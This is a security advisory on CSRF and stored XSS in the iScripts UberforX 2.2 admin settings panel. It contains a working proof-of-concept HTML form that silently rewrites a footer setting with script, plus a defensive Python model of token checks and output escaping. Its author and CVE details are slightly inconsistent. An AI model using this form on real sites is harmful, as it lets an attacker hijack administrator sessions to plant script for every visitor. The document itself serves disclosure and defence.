iScripts UberforX 2.2 CSRF & Stored XSS in Admin Panel

Authors: Korprit Zombie         Risk: High

CVE: CVE-2018-10137            0day: CSRF

CVE: CVE-2018-10136            0day: XSS

CVE: CVE-2018-10135            0day: XSS

0day-id: 0DAY-10137            Date: 2018-04-17

Description

CVE-2018-10137

iScripts UberforX 2.2 has CSRF in the “manage_settings” section of the Admin Panel via the /cms?section=manage_settings&action=edit URI.

CVE-2018-10136

iScripts UberforX 2.2 has Stored XSS in the “manage_settings” section of the Admin Panel via the value field (cms_set_value) submitted to the /cms?section=manage_settings&action=edit URI. The stored value is later rendered unencoded in the page footer.

CVE-2018-10135

iScripts eSwap v2.4 has Reflected XSS via the “catwiseproducts.php” catid parameter in the User Panel.

POC

# Exploit title: iScripts UberforX 2.2 - CSRF & Stored XSS in Admin Panel
# Date: 16/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Software Link: https://www.iscripts.com/uberforx/
# Demo Link: https://www.demo.iscripts.com/uberforx/demo/cms
# Version: 2.2
# CVE: CVE-2018-10135 CVE-2018-10136 CVE-2018-10137
# Tested on: Windows 10 / Kali Linux
# Category: Webapps

a) Deliver the crafted page below to a logged-in user who has Root Administrator level access. The form reproduces the fields of the legitimate "Save" request for setting id 2 (admin_copyright); no anti-CSRF token is required, so nothing ties the request to the administrator's session other than the cookie the browser attaches automatically.
 
<html>
  <!-- CSRF PoC - ManhNho -->
  <body>
  <!-- Hide the attacker URL from the address bar while the page is open -->
  <script>history.pushState('', '', '/')</script>
    <!-- Cross-origin POST to the settings editor; the victim's session cookie is sent with it -->
    <form action="https://www.demo.iscripts.com/uberforx/demo/cms?section=manage_settings&action=edit&id=2" method="POST">
      <input type="hidden" name="id" value="2" />
      <input type="hidden" name="cms_set_name" value="admin_copyright" />
      <!-- Entity-encoded payload; the browser submits it as <script>alert('1')</script> -->
      <input type="hidden" name="cms_set_value" value="&lt;script&gt;alert&#40;&apos;1&apos;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="submit" value="Save" />
      <!-- No CSRF token field: the application does not issue or check one -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
b) Once the logged-in administrator opens the page and the form is submitted, the request is sent with the administrator's active session and the setting is saved successfully.
Because the new value is written into the footer without output encoding, every subsequent page load executes the stored script: the site pops up alert '1' for any visitor.
 
Response:
 
HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 07:44:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 28359
...
</div>
<div class="footer row-fluid">
<p class="muted"><small><script>alert('1')</script></small></p>
</div>
...
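The two defects chain: the missing CSRF token lets a cross-origin page write the setting, and the missing output encoding turns the written value into script. The following Python model, added here as an illustration and not iScripts' own code, plays the PoC's form fields (entities decoded, as the browser would send them) against a handler written the way the advisory describes UberforX behaving, and then against a hardened version with a synchronizer token and HTML-escaped output. The handler, session and render function names are assumed; the request body is taken from the PoC above.

```python
"""Vulnerable vs. hardened model of the manage_settings edit handler.

Added illustration for this advisory; not code from iScripts UberforX.
Function, class and template names below are assumptions.
"""
import hmac
import html
import secrets
from typing import Dict, Optional

# Form fields of the CSRF PoC on this page, with the HTML entities decoded
# the way a browser decodes them before submitting the form.
POC_FIELDS: Dict[str, str] = {
    "id": "2",
    "cms_set_name": "admin_copyright",
    "cms_set_value": "<script>alert('1')</script>",
    "submit": "Save",
}


class AdminSession:
    """Server-side state for one logged-in Root Administrator (assumed shape)."""

    def __init__(self) -> None:
        # Constructed sample value for the footer setting.
        self.settings: Dict[str, str] = {"admin_copyright": "Copyright 2018"}
        self.csrf_token: Optional[str] = None


def vulnerable_edit(session: AdminSession, post: Dict[str, str]) -> int:
    """Behaviour the advisory describes: any POST arriving with the admin's
    cookie is accepted, and the value is stored verbatim. Returns an HTTP status."""
    session.settings[post["cms_set_name"]] = post["cms_set_value"]
    return 200


def vulnerable_render(session: AdminSession) -> str:
    """Footer template as seen in the response above: raw interpolation."""
    return '<p class="muted"><small>%s</small></p>' % session.settings["admin_copyright"]


def issue_csrf_token(session: AdminSession) -> str:
    """Synchronizer token: generated per session and embedded in the legitimate
    edit form as a hidden field. A cross-origin page cannot read it (same-origin
    policy), so the PoC form cannot include it."""
    session.csrf_token = secrets.token_hex(32)
    return session.csrf_token


def hardened_edit(session: AdminSession, post: Dict[str, str]) -> int:
    """Reject any POST whose token does not match the one bound to the session.
    Constant-time comparison avoids leaking the token byte by byte."""
    supplied = post.get("csrf_token", "")
    if not session.csrf_token or not hmac.compare_digest(
        supplied.encode("utf-8"), session.csrf_token.encode("utf-8")
    ):
        return 403
    session.settings[post["cms_set_name"]] = post["cms_set_value"]
    return 200


def hardened_render(session: AdminSession) -> str:
    """Same template, but the stored value is HTML-escaped on output, so a
    value that was stored (by a malicious admin, or before the CSRF fix) renders
    as text instead of executing."""
    return '<p class="muted"><small>%s</small></p>' % html.escape(
        session.settings["admin_copyright"]
    )


def replay_poc() -> Dict[str, object]:
    """Run the PoC body against both handlers and report what the footer contains."""
    weak = AdminSession()
    weak_status = vulnerable_edit(weak, POC_FIELDS)

    strong = AdminSession()
    issue_csrf_token(strong)  # the admin has loaded the real form at some point
    strong_status = hardened_edit(strong, POC_FIELDS)  # PoC carries no token

    return {
        "vulnerable_status": weak_status,
        "vulnerable_footer": vulnerable_render(weak),
        "hardened_status": strong_status,
        "hardened_footer": hardened_render(strong),
    }


if __name__ == "__main__":
    for key, value in replay_poc().items():
        print(f"{key}: {value}")
```

The token check alone stops this PoC, but it does not remove the stored XSS: an administrator account (or a future request that does carry a token) can still store the payload, so the escape on output is needed as well. Setting the session cookie with `SameSite=Lax` or `Strict` is a further layer that keeps the browser from attaching it to the cross-site POST in the first place.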
